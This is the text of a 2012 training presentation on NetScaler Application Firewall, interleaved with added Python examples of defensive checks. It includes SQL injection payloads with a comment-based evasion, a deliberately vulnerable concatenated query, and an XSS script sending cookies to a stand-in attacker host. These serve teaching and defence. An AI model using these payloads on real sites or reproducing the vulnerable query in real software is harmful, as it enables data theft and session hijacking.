Protect your data from web-based attacks with NetScaler Application Firewall
Rónán O’Brien, Senior Support Readiness
May 2012
2#CitrixSynergy
Agenda
• Application Firewalls
• Security Models
• Application Firewall Wizard
• Attack Examples
• Learning
• Logging
• Deployment checklist
Application Firewalls
Application Firewalls
• "Application" implies Layer 7: the firewall parses HTTP requests and responses (URLs, headers, form fields, cookies, XML bodies), not packets and ports.
• Not to be confused with network firewalls.
• Application firewalls vs Deep Packet Inspection (DPI): DPI matches patterns in packet payloads; an application firewall reassembles the stream and understands the application protocol.
• SSL offload: traffic is decrypted on the appliance, so inspection works on the cleartext.
• XML aware.
• Payment Card Industry Data Security Standard (PCI-DSS): a web application firewall in front of public-facing web applications is one of the controls requirement 6.6 accepts.
us-cert.gov
• Vulnerability and attack reports can be found at www.us-cert.gov.
• US-CERT is the operational arm of the National Cyber Security Division (NCSD) at the Department of Homeland Security (DHS).
Application Firewall citrix.com site
Traffic Flow Architecture (diagram): Client IP -> VIP (vserver) -> SNIP -> Server1 IP / Server2 IP / Server3 IP
Lab Structure
• Self-contained labs, cloud hosted.
• Go to http://training.citrixsynergy.net and enter the course code and your business e-mail address.
• Course code: SanFran
Lab Structure
• Click to open Web Interface, where you can launch published XenCenter.
• The digital lab guide is here.
• Limited printed copies available.
LABS 1 & 2
Security Models
Security Models
• Positive Security Model: allow only known good traffic.
• Negative Security Model: block only known bad traffic.
Security Models
• NetScaler provides both models.
• Positive and negative use cases.
• Signatures available for download.
• Learning makes the positive security model easier to configure.
Application Firewall Actions - Blocking
• A request-side block results in one of:
1. Redirect to the root of the website (/), the default.
2. Redirect to a URL of your choice (relative or absolute).
3. A custom error page served from the appliance.
4. Transform: the request is passed on after the offending characters have been neutralised.
• A response-side block results in:
○ Termination of the response, or
○ X-ing out of sensitive data before it reaches the client.
Application Firewall Actions - Logging
• Every block action is logged.
• We can choose not to block, but still log the violation.
• We can create ‘relaxations’ directly from the logs.
• Logging is on the appliance, or can be sent to a 3rd-party collector.
• Logging is in Syslog format, and as of NetScaler 10 also in CEF format.
Application Firewall Actions - Stat
• NetScaler AppFirewall collects stats on violations.
• Reporting is on the appliance.
• Reporting can also be performed by a 3rd party (e.g. Splunk or Citrix Command Center).
Application Firewall Actions - Learn
• NetScaler App Firewall has built-in learning intelligence.
• It creates the Regex rule, so you don’t have to!
• For scale (when thousands of learned rules are presented), we use the Visualizer.
Application Firewall Wizard
Application Firewall Wizard
• One-stop shop for configuring Application Firewall.
• Can be used to modify configs previously created by the wizard.
• Positive and negative security models.
• Deep protections.
• Integrates also with Learning.
Application Firewall Wizard
Lab 3 & 4
Attack Examples
Forceful Browsing
• Experienced internet/application users.
• Predictable file system layout.
• Lack of web server hardening (directory browsing not disabled).
• Reconnaissance.
• Site may be used as an attack platform (but otherwise left untouched).
URL Closure (diagram): the page served by www.newstimes.com links to headline1.htm, headline2.htm and headline3.htm (<A Href="headline1.htm"><A Href="headline2.htm"><A Href="headline3.htm">). The client then sends
GET headline4.htm Host: newstimes.com
which was never linked from a page this session was served, so URL closure treats it as forceful browsing and blocks it.
Lab 5
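The URL closure slide above is a positive model for navigation: a session may request the configured start URLs plus any URL that appeared as a link in a page already served to that session. The following is an added Python example, not NetScaler code, of that rule with the slide's headline pages; the start URL (the site root), the session identifiers and the home-page HTML are constructed for the example.

```python
"""URL closure (positive navigation model) as an added Python illustration;
not NetScaler code. Assumes one start URL, the site root, and the constructed
page below standing in for newstimes.com's home page."""
import re
from urllib.parse import urljoin, urlparse

HREF_RE = re.compile(r"""<a\s[^>]*?href\s*=\s*["']([^"'#]+)["']""", re.I)

HOME_PAGE = """<html><body>
<A Href="headline1.htm">Story 1</A>
<A Href="headline2.htm">Story 2</A>
<A Href="headline3.htm">Story 3</A>
</body></html>"""   # constructed sample response


def normalise(url):
    """Compare on host and path only; query strings do not create new pages."""
    p = urlparse(url)
    return (p.netloc.lower(), p.path or "/")


class UrlClosure:
    def __init__(self, start_urls):
        self.start = {normalise(u) for u in start_urls}
        self.seen = {}      # session id -> set of URLs this session has been shown links to

    def check_request(self, session, url):
        """Allow a start URL, or any URL previously linked from a page served to
        this session; anything else is forceful browsing and is blocked."""
        key = normalise(url)
        allowed = self.seen.setdefault(session, set())
        return key in self.start or key in allowed

    def learn_response(self, session, page_url, body):
        """Record every hyperlink in a served page as reachable for this session."""
        allowed = self.seen.setdefault(session, set())
        for href in HREF_RE.findall(body):
            allowed.add(normalise(urljoin(page_url, href)))


def demo():
    fw = UrlClosure(["http://newstimes.com/"])
    out = {}
    out["home"] = fw.check_request("s1", "http://newstimes.com/")
    fw.learn_response("s1", "http://newstimes.com/", HOME_PAGE)
    out["linked"] = fw.check_request("s1", "http://newstimes.com/headline2.htm")
    out["guessed"] = fw.check_request("s1", "http://newstimes.com/headline4.htm")
    # a second session that never saw the home page may not jump straight to a story
    out["other_session"] = fw.check_request("s2", "http://newstimes.com/headline2.htm")
    return out


if __name__ == "__main__":
    print(demo())
```

The per-session table is what makes this a closure rather than a static allow-list: headline2.htm is fine for the session that was shown the link and forceful browsing for one that was not. In practice the table is bounded by a session timeout, and deep links that users legitimately bookmark are added as extra start URLs.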
SQL Injection
• Uses SQL logic and a vulnerable web form to extract information from the database.
• Does not impact or violate the web server, but results in unauthorised access to data.
• Adds an additional SQL command to a non-validated form field.
SQL Injection Custom Actions
• Violation actions include allowing the request to continue after neutralising the attack (transform).
• SQL comments can be used to get around basic string scanning protection, so the value has to be normalised (comments removed) before it is scanned.
Lab 6
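The two SQL injection slides above make three points: a concatenated form field becomes SQL, comments defeat a scanner that only looks for the obvious `' OR ` string, and a transform can neutralise instead of block. The following added Python/SQLite example, not NetScaler code, runs all three against an in-memory table; the naive pattern, the comment-stripping normalisation and the quote-doubling transform are this example's own assumptions about how such checks might be written.

```python
"""SQL injection through string concatenation, comment-based evasion of a naive
scanner, normalisation before scanning, and a 'transform' action. Added
Python/SQLite illustration; not NetScaler code. The naive pattern and the
quote-doubling transform are assumptions chosen for the demo."""
import re
import sqlite3

NAIVE_RE = re.compile(r"'\s+(?:or|and)\s+", re.I)      # only catches "' OR " with real spaces
BLOCK_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)


def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", [("alice", "s1"), ("bob", "s2")])
    return con


def lookup_vulnerable(con, name):
    # deliberately vulnerable: the form value is pasted into the SQL text
    return con.execute("SELECT secret FROM users WHERE name = '" + name + "'").fetchall()


def lookup_safe(con, name):
    # parameterised: the value can never change the statement's structure
    return con.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()


def scan_naive(value):
    return NAIVE_RE.search(value) is not None


def normalise(value):
    """Replace SQL block comments with a space and collapse whitespace, so
    '/**/OR/**/' looks like ' OR ' to the scanner."""
    return re.sub(r"\s+", " ", BLOCK_COMMENT_RE.sub(" ", value))


def scan_normalised(value):
    return NAIVE_RE.search(normalise(value)) is not None


def transform(value):
    """Neutralise instead of block: double single quotes so they stay inside the literal."""
    return value.replace("'", "''")


def demo():
    con = build_db()
    plain = "' OR 1=1--"
    evasive = "'/**/OR/**/1=1--"
    return {
        "plain_rows": len(lookup_vulnerable(con, plain)),           # dumps every secret
        "evasive_rows": len(lookup_vulnerable(con, evasive)),       # SQLite accepts /**/ as whitespace
        "naive_catches_plain": scan_naive(plain),
        "naive_catches_evasive": scan_naive(evasive),
        "normalised_catches_evasive": scan_normalised(evasive),
        "transformed_rows": len(lookup_vulnerable(con, transform(evasive))),
        "parameterised_rows": len(lookup_safe(con, evasive)),
    }


if __name__ == "__main__":
    print(demo())
```

The transformed request still reaches the application, which is the point of that action: the value `'''/**/OR/**/1=1--'` is now one string literal, so the same vulnerable code returns nothing. It is a mitigation for an application you cannot fix, not a substitute for the parameterised query.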
Cross Site Scripting
• Tricking a browser into executing a malicious script.
• Can be dynamic (reflected straight back from the request) or static (stored in the application and served to every visitor).
• Example: the customer logs into onlinebank.com. A malicious user sends the customer an e-mail with an HTTP link, which the user clicks:
http://www.onlinebank.com/login.jsp?name=<script>Send cookies to http://piratesite.net</script>
The login page reflects the name parameter into its HTML, the script runs in the onlinebank.com origin, and the onlinebank.com cookies are sent to piratesite.net.
Lab 7
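The example above is reflected XSS: whatever arrives in `name` is written into the page. The following added Python example, not NetScaler code, shows the vulnerable rendering beside the escaped one, and a request-side check that URL-decodes parameters until they stop changing before looking for script, since attackers double-encode to get past a single decode. The login.jsp URL is from the slide; the cookie-stealing script body and the rendering template are constructed.

```python
"""Reflected XSS: the login page echoes 'name' into HTML. Added Python illustration
(not NetScaler code) of the vulnerable and escaped renderings and of a request-side
check that decodes parameters before scanning. The login.jsp URL is from the slide;
the script body standing in for 'Send cookies to http://piratesite.net' is constructed."""
import html
import re
from urllib.parse import parse_qs, quote, unquote, urlparse

PAYLOAD = "<script>new Image().src='http://piratesite.net/?c='+document.cookie</script>"

XSS_RE = re.compile(r"<\s*/?\s*script\b|javascript\s*:|on\w+\s*=", re.I)


def render_vulnerable(name):
    return "<h1>Welcome, " + name + "</h1>"          # raw reflection: script executes


def render_safe(name):
    return "<h1>Welcome, " + html.escape(name, quote=True) + "</h1>"   # &lt;script&gt; is text


def decode_fully(value, rounds=3):
    """Peel percent-encoding until the value stops changing (bounded)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_url(url):
    """Return ('block', field) for the first parameter carrying script, else ('allow', None)."""
    for field, values in parse_qs(urlparse(url).query, keep_blank_values=True).items():
        for v in values:
            if XSS_RE.search(decode_fully(v)):
                return ("block", field)
    return ("allow", None)


def demo():
    link = "http://www.onlinebank.com/login.jsp?name=" + quote(PAYLOAD)
    double = "http://www.onlinebank.com/login.jsp?name=" + quote(quote(PAYLOAD))
    return {
        "vulnerable_executes": "<script>" in render_vulnerable(PAYLOAD),
        "escaped_executes": "<script>" in render_safe(PAYLOAD),
        "link": inspect_url(link),
        "double_encoded": inspect_url(double),
        "benign": inspect_url("http://www.onlinebank.com/login.jsp?name=bob"),
    }


if __name__ == "__main__":
    print(demo())
```

Output encoding in the application (`html.escape`) is the real fix; the request-side pattern is the compensating control a firewall applies in front of code that does not do it, and it is only as good as its canonicalisation, which is why `decode_fully` runs before the pattern.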
Application Vulnerability Scans
• Security companies offer an automated scan to test for known vulnerabilities.
• Scanning is usually performed on a continual basis, as:
○ the application itself is changed/developed;
○ new attack methods and vulnerabilities are discovered.
• NetScaler Application Firewall understands the scan report and suggests the necessary protections to close the security holes.
Lab 8
Form Field Consistency
• Attack method: client-side modification of form properties.
• Vulnerability: client input not validated.
• Result: compromise of application logic.
• Hidden form elements (e.g. prices).
• Form structure, e.g. radio buttons, check boxes etc.
Lab 9
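The Form Field Consistency slide above lists what the check has to remember about a served form: the values of hidden fields and the legal values of radio buttons and check boxes. The following added Python example, not NetScaler code, records those when a form goes out under a random form id appended to the form, and compares the submission against that record. The order form, its field names and the `as_fid` tracking field are constructed for the example.

```python
"""Form field consistency check, added Python illustration (not NetScaler code).
When a form is served, its hidden values and the legal values of radio/checkbox
fields are recorded under a random form id that is appended to the form; on
submission the fields are compared against that record. The field names and
the sample form are constructed for the demo."""
import re
import secrets

INPUT_RE = re.compile(r"<input\b([^>]*)>", re.I)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
FORM_ID = "as_fid"    # assumed name for the tracking field

ORDER_FORM = """<form method="post" action="/order">
<input type="hidden" name="sku" value="BOOK-42">
<input type="hidden" name="price" value="49.99">
<input type="radio" name="shipping" value="std"> standard
<input type="radio" name="shipping" value="express"> express
<input type="text" name="qty" value="1">
<input type="submit" value="Buy">
</form>"""    # constructed sample response body


class FormFieldConsistency:
    def __init__(self):
        self.forms = {}   # form id -> what the server put in the form

    def on_response(self, body):
        """Record the form's server-set fields and return the body with a form id added."""
        hidden, choices, free = {}, {}, set()
        for attrs_text in INPUT_RE.findall(body):
            attrs = {k.lower(): v for k, v in ATTR_RE.findall(attrs_text)}
            name = attrs.get("name")
            if not name:
                continue
            kind = attrs.get("type", "text").lower()
            if kind == "hidden":
                hidden[name] = attrs.get("value", "")
            elif kind in ("radio", "checkbox"):
                choices.setdefault(name, set()).add(attrs.get("value", "on"))
            elif kind != "submit":
                free.add(name)           # user-typed field: any value, subject to other checks
        fid = secrets.token_hex(16)
        self.forms[fid] = {"hidden": hidden, "choices": choices, "free": free}
        tag = '<input type="hidden" name="%s" value="%s">' % (FORM_ID, fid)
        return body.replace("</form>", tag + "</form>"), fid

    def on_request(self, fields):
        """Return the list of violations for a submitted field dict (empty means consistent)."""
        spec = self.forms.get(fields.get(FORM_ID))
        if spec is None:
            return ["form id missing or unknown"]
        violations = []
        for name, value in fields.items():
            if name == FORM_ID:
                continue
            if name in spec["hidden"]:
                if value != spec["hidden"][name]:
                    violations.append("hidden field %s modified" % name)
            elif name in spec["choices"]:
                if value not in spec["choices"][name]:
                    violations.append("field %s has unexpected value" % name)
            elif name not in spec["free"]:
                violations.append("unexpected field %s" % name)
        for name in spec["hidden"]:
            if name not in fields:
                violations.append("hidden field %s missing" % name)
        return violations


def demo():
    ffc = FormFieldConsistency()
    _, fid = ffc.on_response(ORDER_FORM)
    base = {"sku": "BOOK-42", "price": "49.99", "shipping": "std", "qty": "2", FORM_ID: fid}
    return {
        "legit": ffc.on_request(base),
        "price": ffc.on_request({**base, "price": "0.01"}),
        "shipping": ffc.on_request({**base, "shipping": "free"}),
        "extra": ffc.on_request({**base, "discount": "100"}),
        "no_id": ffc.on_request({k: v for k, v in base.items() if k != FORM_ID}),
    }


if __name__ == "__main__":
    print(demo())
```

The server-side record is what the application failed to keep: the price it sent is the price it should accept. A stateless variant signs the same record with an HMAC and carries it in the form instead, at the cost of a shared key on every appliance.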
Protecting Application Cookies
• Cookies are web application / web server identity tokens.
• Session vs persistent.
• Name/value configuration.
• Application Firewall cookie ‘proactive’ actions include encrypting and proxying cookies (next).
• If a cookie is tampered with, the action is to block.
Cookie Encryption & Decryption (diagram)
Server -> Application Firewall: Set-Cookie: user=bob
Application Firewall -> Client: Set-Cookie: user=KLJDG84NMRG
Client -> Application Firewall: Cookie: user=KLJDG84NMRG
Application Firewall -> Server: Cookie: user=bob
Cookie Proxying (diagram)
Server -> Application Firewall: Set-Cookie: user=bob, Set-Cookie: access=limited
Application Firewall -> Client: Set-Cookie: AppfwCookieJar=H77HFDSH908
Client -> Application Firewall: Cookie: AppfwCookieJar=H77HFDSH908
Application Firewall -> Server: Cookie: user=bob, Cookie: access=limited
Lab 10
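The two cookie diagrams above intercept the same two points, Set-Cookie on the way out and Cookie on the way back; encryption replaces each value with ciphertext, proxying replaces the whole set with one opaque handle. The following added Python example, not NetScaler code, implements the proxying variant with the slide's `user`/`access` cookies and `AppfwCookieJar` name, and applies the "tampered means block" rule. It assumes every cookie the application sets is proxied, so a client presenting application cookie names directly, or an unknown jar id, is blocked; the jar id generation and cookie attributes are this example's choices.

```python
"""Cookie proxying as an added Python illustration (not NetScaler code):
application Set-Cookie headers are held in a server-side jar and the client
only ever sees one opaque AppfwCookieJar cookie. Assumes every cookie the
application sets is proxied; a client presenting application cookie names
directly, or an unknown jar id, is treated as tampering and blocked."""
import secrets
from http.cookies import SimpleCookie

JAR = "AppfwCookieJar"


class CookieProxy:
    def __init__(self):
        self.jars = {}    # opaque id -> {cookie name: value}

    def on_response(self, set_cookie_headers):
        """Swallow the application's Set-Cookie headers; emit one jar cookie instead."""
        stored = {}
        for header in set_cookie_headers:
            c = SimpleCookie()
            c.load(header)
            for name, morsel in c.items():
                stored[name] = morsel.value
        jar_id = secrets.token_hex(16)            # unguessable handle, nothing about the user in it
        self.jars[jar_id] = stored
        return ["%s=%s; Path=/; HttpOnly; Secure" % (JAR, jar_id)]

    def on_request(self, cookie_header):
        """Return (decision, Cookie header to forward to the server)."""
        c = SimpleCookie()
        c.load(cookie_header or "")
        presented = {name: morsel.value for name, morsel in c.items()}
        jar_id = presented.pop(JAR, None)
        if presented:
            return ("block", None)     # client sent application cookies itself: tampering
        if jar_id is None:
            return ("allow", "")       # new visitor, no session yet
        stored = self.jars.get(jar_id)
        if stored is None:
            return ("block", None)     # forged or expired jar id
        return ("allow", "; ".join("%s=%s" % kv for kv in stored.items()))


def demo():
    proxy = CookieProxy()
    to_client = proxy.on_response(["user=bob; Path=/", "access=limited; Path=/"])
    jar_id = to_client[0].split(";")[0].split("=", 1)[1]
    return {
        "client_sees_app_cookies": any(h.startswith("user=") for h in to_client),
        "replay": proxy.on_request("%s=%s" % (JAR, jar_id)),
        "tampered": proxy.on_request("user=bob; access=admin"),      # edited by hand
        "forged": proxy.on_request("%s=H77HFDSH908" % JAR),          # id never issued
        "first_visit": proxy.on_request(""),
    }


if __name__ == "__main__":
    print(demo())
```

The application never learns its cookies left the server, and an attacker who wants `access=admin` has nothing to edit: the only cookie in the browser is a random handle. The jar must expire entries with the session, and in an HA pair it has to be replicated or pinned, which is the operational cost of the stateful variant compared with encryption.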
Learning
Learning
Learned data
• is used to create rules for the positive security model.
• can be exported to a CSV for analysis.
• is propagated in an HA pair of appliances.
• is stored in RegEx format.
• should not be left permanently turned on in production: anything observed while learning is on, attacks included, ends up shaping the rules.
Lab 11
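The Learn and Learning slides above say the appliance turns observed values into RegEx rules for the positive model and that learning must not stay on. The following added Python example, not NetScaler's learning code, is a miniature of that: it records the shape of every value seen per field, generalises the shapes into a regex, enforces it, and then shows what one attack observed during learning does to the rule. The field names and sample values are constructed.

```python
"""A miniature 'learning' engine as an added Python illustration (not
NetScaler's learning code): it watches values seen for each form field,
generalises them into a regular expression, and that regex becomes the
positive-model rule. It also shows why learning must be switched off once
the rules are built: an attack seen during learning widens the rule."""
import re
from collections import defaultdict

TOKEN_RE = re.compile(r"[0-9]+|[A-Za-z]+|[^0-9A-Za-z]")


def shape(value):
    """Token classes with lengths: '94103' -> [('d', 5)], 'ORD-12' -> [('a',3),('lit:-',1),('d',2)]."""
    out = []
    for tok in TOKEN_RE.findall(value):
        if tok.isdigit():
            out.append(("d", len(tok)))
        elif tok.isalpha():
            out.append(("a", len(tok)))
        else:
            out.append(("lit:" + tok, 1))
    return out


class FieldLearner:
    def __init__(self):
        self.samples = defaultdict(list)   # field -> list of shapes seen

    def observe(self, field, value):
        self.samples[field].append(shape(value))

    def rule(self, field):
        """One alternative per distinct class sequence, with per-token length ranges."""
        groups = {}
        for sh in self.samples[field]:
            key = tuple(cls for cls, _ in sh)
            lens = groups.setdefault(key, [[n, n] for _, n in sh])
            for slot, (_, n) in zip(lens, sh):
                slot[0], slot[1] = min(slot[0], n), max(slot[1], n)
        alts = []
        for key, lens in groups.items():
            parts = []
            for cls, (lo, hi) in zip(key, lens):
                if cls == "d":
                    atom = r"\d"
                elif cls == "a":
                    atom = "[A-Za-z]"
                else:
                    parts.append(re.escape(cls[4:]))   # literal separator
                    continue
                parts.append(atom + ("{%d}" % lo if lo == hi else "{%d,%d}" % (lo, hi)))
            alts.append("".join(parts))
        return "^(?:" + "|".join(alts) + ")$"

    def enforce(self, field, value):
        return re.match(self.rule(field), value) is not None


def demo():
    learner = FieldLearner()
    for z in ("94103", "10001", "02134"):          # constructed clean traffic
        learner.observe("zip", z)
    for o in ("ORD-1234", "ORD-98765"):
        learner.observe("order", o)
    out = {
        "zip_rule": learner.rule("zip"),
        "zip_ok": learner.enforce("zip", "60601"),
        "zip_sqli": learner.enforce("zip", "' OR 1=1--"),
        "order_ok": learner.enforce("order", "ORD-55555"),
        "order_short": learner.enforce("order", "ORD-12"),
    }
    # learning left on: the attack itself is observed and becomes part of the rule
    learner.observe("zip", "' OR 1=1--")
    out["zip_sqli_after_poisoning"] = learner.enforce("zip", "' OR 1=1--")
    return out


if __name__ == "__main__":
    print(demo())
```

This is why the deployment slide later talks about using policies and ACLs to admit only trusted users while learning runs: the rule is only as clean as the traffic that taught it.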
HTML Comment Stripping
• Programming comments:
<!--This is a comment. Comments are not displayed in the browser
But may contain all sorts of temporary information -->
• Some scripts include comments too:
<script type="text/javascript">
<!-- function displayMsg() {
alert("Hello World!") } //--> </script>
Lab 12
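The second snippet above is the catch with comment stripping: inside `<script>`, the `<!-- ... //-->` wrapper is JavaScript as far as the browser is concerned, and removing it as an HTML comment removes the function. The following added Python example, not NetScaler code, strips comments from the response body with a mode that leaves script bodies alone, and lists the comments so a reviewer can see what was about to leave the server. The page is constructed from the slide's snippet plus one invented leaked detail, and the three mode names are this example's own.

```python
"""HTML comment stripping as an added Python illustration (not NetScaler code),
with a mode that leaves <script> bodies untouched: the legacy '<!-- ... //-->'
wrapper inside scripts is JavaScript to the browser, and stripping it as an
HTML comment deletes the script. Sample page constructed from the slide."""
import re

COMMENT_RE = re.compile(r"<!--.*?-->", re.S)
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.S | re.I)

PAGE = """<html><body>
<!--This is a comment. Comments are not displayed in the browser
But may contain all sorts of temporary information: db=10.0.0.5 -->
<p>Hello</p>
<script type="text/javascript">
<!-- function displayMsg() {
alert("Hello World!") } //--> </script>
</body></html>"""   # constructed from the slide's snippet; db=... is an invented leak


def find_comments(body):
    """Every HTML comment that would leave the server, for review."""
    return COMMENT_RE.findall(body)


def strip_comments(body, mode="exclude_script"):
    """mode: 'none' | 'all' | 'exclude_script' (strip outside <script> only)."""
    if mode == "none":
        return body
    if mode == "all":
        return COMMENT_RE.sub("", body)
    out, pos = [], 0
    for m in SCRIPT_RE.finditer(body):
        out.append(COMMENT_RE.sub("", body[pos:m.start()]))
        out.append(m.group(0))           # script block passes through verbatim
        pos = m.end()
    out.append(COMMENT_RE.sub("", body[pos:]))
    return "".join(out)


def demo():
    safe = strip_comments(PAGE, "exclude_script")
    aggressive = strip_comments(PAGE, "all")
    return {
        "comments_found": len(find_comments(PAGE)),
        "leak_removed": "db=10.0.0.5" not in safe,
        "script_kept": "displayMsg" in safe,
        "script_lost_with_all": "displayMsg" not in aggressive,
    }


if __name__ == "__main__":
    print(demo())
```

Run the "all" mode only after checking the review list for script wrappers; stripping is a response-side transform and a broken page is a quieter failure than a blocked request.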
Deployment points to bear in mind
Before Turning on Application Firewall
• Sizing: look at the web application logs and response sizes.
• Decide which parts of the application need to be protected, and whether they require different levels of protection.
• Some protections are more resource intensive than others.
• Clever usage of policies and ACLs can allow only specific groups access to the application, to fill the learning DB with valid traffic patterns.
Before you leave…
• Conference surveys are available online at www.citrixsummit.com starting Thursday, May 10. Provide your feedback and pick up a complimentary gift at the registration desk.
• Download presentations starting Monday, May 21, from your My Organizer tool located in your My Account.